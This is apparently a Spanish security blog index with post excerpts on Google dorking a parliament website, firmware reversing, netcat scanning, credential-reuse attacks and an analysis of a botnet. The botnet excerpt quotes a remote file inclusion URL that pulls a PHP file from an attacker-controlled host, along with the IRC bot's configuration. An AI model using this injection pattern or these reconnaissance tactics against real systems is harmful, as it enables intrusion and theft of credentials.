Crawling pasivo usando Google Hacking

A la hora de auditar una aplicación web son muchos los recursos que nos ayudan a hacernos un mapa mental de la web que debemos investigar. Muchas de estas herramientas generan mucho ruido en los logs ya que utilizan fuerza bruta y un listado de directorios/archivos, esto puede hacer saltar las alarmas de un administrador, por lo que yo no suelo utilizarlas (La fuerza bruta es siempre mi último recurso). En este caso vamos a ver como utilizando dorks de Google podemos conseguir muy buenos resultados y descubrir lugares que a priori estaban ocultos en la aplicación.

Aclarar que este post se basa en como yo lo hago y que como en todo cada maestrillo tiene su librillo, así que si utilizas otras técnicas te animo a compartirlas en los comentarios.

Para este ejemplo utilizaremos como objetivo la web del congreso de los diputados ( www.congreso.es ) y partiremos de la base de que desconocemos totalmente la tecnología que usa, sus subdirectorios, subdominios, etc...

[Tutorial] Reversing AXIS Q6032-E Network Camera Firmware

Hace tiempo que tenía ganas de escribir este post, si hay algo que me gusta del mundo del hacking es el reversing y todavía mas si hablamos de sistemas embebidos. En este post vamos a ver como extraer todos los archivos incluidos en una imagen de firmware.

Quiero avisar desde un principio que esto no es una ciencia exacta, por lo que lo que hagamos para esta imagen puede funcionar con el firmware de otra sistema o no, por lo que la utilidad de este texto es servir como guía para conocer la metodología de trabajo y las herramientas que harán nuestra vida mas fácil a la hora de buscar vulnerabilidades en este tipo de sistemas.

En primer lugar vamos a preparar nuestro arsenal de herramientas para estos menesteres:

• Firmware Mod Kit es un set de herramientas para descompresión y reconstrucción del firmware.

• Binwalk es una herramienta que reconoce las cabeceras de los archivos entre otras cosas. 
• Comandos útiles del sistema: dd, strings, hexdump, gunzip, unzip, tar ...

Todo lo anterior excepto firmware mod kit viene integrado en Kali Linux por lo que si lo tenéis mano os ahorraréis el trabajo de instalarlo.

 Bien, empecemos. Lo primero será descargar la imagen de la página del vendor

Conferencia de la NSA en la BlackHat

Como muchos sabréis la BlackHat ha comenzado y una de las charlas iniciales que mas expectativas ha generado ha sido la de la NSA a cargo del General Alexander.

Con el escandalo de PRISM en pleno apogeo y con mas y mas información publicandose es interesante ver el punto de vista de una de las partes.

Aquí tenéis el vídeo:

  

Escaneo de puertos y banner grabbing con netcat

Normalmente estamos acostumbrados a disponer de nuestro arsenal de novedosas y potentes herramientas que hacen nuestro trabajo mas facil, pero esto no es siempre así, se puede dar el caso de que una vez hemos accedido a un sistema necesitamos seguir investigando la red pero solo disponemos de las herramientas del sistema. Para esta tarea tenemos a nuestro amigo netcat.

En primer lugar hay que tener en cuenta que netcat tiene funciones tanto de cliente como de servidor, por lo que podremos establecer una conexión entre dos máquinas únicamente con esta herramienta.

Analizando una Botnet y buscando a sus administradores.

Hace unos días un conocido me comentó que alguien había intentado acceder a su web y había tratado inyectar una URL, pero la forma de hacerlo no tenía sentido. Me llamó la atención y le dije que me enviase ejemplos de lo que habían tratado de hacer.

Intento de explotación de un LFI:

www.dominiovictima.com/gratis//appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt

Analizando la URL atacada podemos ver dos partes claramente diferenciadas, la url víctima y la inyección, en esta última vemos otra URL que contiene un archivo .txt:

/appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt

Vamos a ver el contenido de ese sospechoso txt que podeis encontrar aqui:

<?php
var $config = array("server"=>"irc.dominio.net", 
                     "port"=>"6667",   
                     "pass"=>"",  
                     "prefix"=>"BoT",  
                     "maxrand"=>"5",  
                     "chan"=>"#channel",  
                     "chan2"=>"#channel", 
                     "key"=>"senhadocanal",     
                     "modes"=>"+p",            
                     "password"=>"terpmak",          
                     "trigger"=>".",  
                     "hostauth"=>"127.0.0.1" 
                     );
?>

A simple vista lo primero que llama la atención son tres cosas, una cabecera bastante descriptiva de lo que hace el script, unas líneas de configuración y un footer con el nombre de una comunidad.

Hacking indirecto (o como lo quieras llamar)

En este post quiero tratar un tema que normalmente no se controla en las empresas y puede suponer un riesgo grave. Es muy común que la política de contraseñas de una empresa sea como la de BYOD, traete tu contraseña de casa que así te la memorizas y no nos das el coñazo. Pero esto supone un problema y es que según las estadísticas el 75% de las personas utilizan la misma contraseña para todos los servicios.

Supongamos un caso de una empresa con un portal web a través del cual todos los empleados acceden a la intranet y su webmail, un atacante intenta acceder a esta intranet pero no logra ningún acceso directo, dicho atacante antes de plantearse la ingeniería social utiliza la FOCA para extraer nombres de empleados a través de los metadatos de los documentos alojados en el portal web. Una vez con estos nombres extraidos y tras un poco de trabajo de recopilación de información el atacante rastrea un poco el Twitter, Facebook y la información indexada en los buscadores asociada a cada persona pudiendo conocer los hábitos y servicios que ésta utiliza. En este punto el atacante puede buscar una vulnerabilidad en una página usada por uno o varios empleados y hacerse con los credenciales de estos empleados aprovechandose de un incorrecto o nulo cifrado de la página secundaria.

En relación a la anterior otra manera de proceder sería utilizar un dork para rastrear los emails que hay indexados en los buscadores relacionados a un dominio. Por ejemplo podríamos usar intext:"@dominio.com" y nos encontraríamos con una serie de personas que han utilizado su cuenta de correo empresarial para registrarse en diversos servicios en los cuales no está garantizada la seguridad.

Como veis hay varias posibilidades de conseguir unos credenciales básicos para acceder a vuestro objetivo primario sin necesidad de utilizar métodos ruidosos contra él y levantar alarmas antes de tiempo. Los responsables de seguridad de una empresa siempre deben dejar claro que el empleado debe separar sus contraseñas personales de las laborales y nunca registrarse en servicios externos con correos y/o contraseñas  empresariales. Esto no siempre se lleva a cabo y las consecuencias pueden ser muy graves como para no valorarlo.

Comprometen el sistema de navegación de un avión mediante Android

Hugo Teso, piloto comercial e investigador de seguridad en la compañía de seguridad alemana N.Runs ha presentado un método a través del cual logra el control total sobre el sistema de navegación de un avión logrando manipular la ruta de éste.

Teso dijo que fue capaz de interceptar las comunicaciones con el enlace de 1Mbps descartando la información real e inyectando información falsa utilizando hardware de control de navegación y software específico que se puede encontrar públicamente el cual fue usado de puente.

"Esperaba que tuviesen agujeros de seguridad pero no me esperaba que fuesen tan fáciles de  detectar. Pensaba que tendría que luchar duro para entrar pero no fue tan difícil", Dijo Teso

Su aplicación no era mas que una prueba de concepto y comentó que las agencias europeas y americanas ya están trabajando en arreglar el problema. Dada la gravedad del problema esperemos ver una solución en el plazo mas breve posible.

Paper: Aircraft Hacking: Practical Aero Series